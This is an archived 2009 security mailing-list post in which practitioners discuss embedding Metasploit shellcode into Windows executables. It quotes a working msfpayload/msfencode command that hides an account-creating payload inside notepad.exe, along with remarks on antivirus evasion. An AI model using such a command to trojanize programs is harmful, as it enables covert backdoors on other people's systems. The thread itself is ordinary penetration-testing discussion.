PaulDotCom mailing list archives
Manually embedding shellcode into executables
From: dimitrios at gmail.com (Dimitrios Kapsalis)
Date: Tue, 1 Dec 2009 20:25:12 -0600
I haven't had much success with the msfpayload, seem that most virus scans pick up the payload. Even tried to use a couple types of encoding stacked on top of each other with out much luck. play with it and then test exe against virustotal.com On Tue, Dec 1, 2009 at 4:17 PM, Adrian Crenshaw <irongeek at irongeek.com>wrote:
Ok, I just read Rob post here: http://www.room362.com/blog/2009/11/3/metasploit-blends-in-new-msfpayloadencode.html and checked my exes. Since both are the same size, I'm guessing it's not working as a binder but as a "cloaker" of sorts. Adrian On Tue, Dec 1, 2009 at 5:12 PM, Adrian Crenshaw <irongeek at irongeek.com>wrote:Ok, I did this: $ msfpayload windows/adduser user=test pass=test exitfunc=seh R | msfencode -t exe -x notepad.exe -o MYNEWFILE.exe The exe made has the same icon an metadata as the original. The payload runs since the "test" account is created, but notepad never comes up, so it doen not make much of a binder. Any ideas? Adrian_______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20091201/976928c8/attachment.htm
Current thread:
- Manually embedding shellcode into executables Matthew Raspberry (Dec 01)
- Manually embedding shellcode into executables Dimitrios Kapsalis (Dec 01)
- Manually embedding shellcode into executables Adrian Crenshaw (Dec 01)
- Manually embedding shellcode into executables Rob Fuller (Dec 01)
- Manually embedding shellcode into executables Adrian Crenshaw (Dec 01)
- Manually embedding shellcode into executables Adrian Crenshaw (Dec 01)
- Manually embedding shellcode into executables Rob Fuller (Dec 01)
- Manually embedding shellcode into executables Adrian Crenshaw (Dec 01)
- Manually embedding shellcode into executables Dimitrios Kapsalis (Dec 01)
- Manually embedding shellcode into executables Dimitrios Kapsalis (Dec 01)
- <Possible follow-ups>
- Manually embedding shellcode into executables Matthew Raspberry (Dec 02)
- Manually embedding shellcode into executables Robert Portvliet (Dec 30)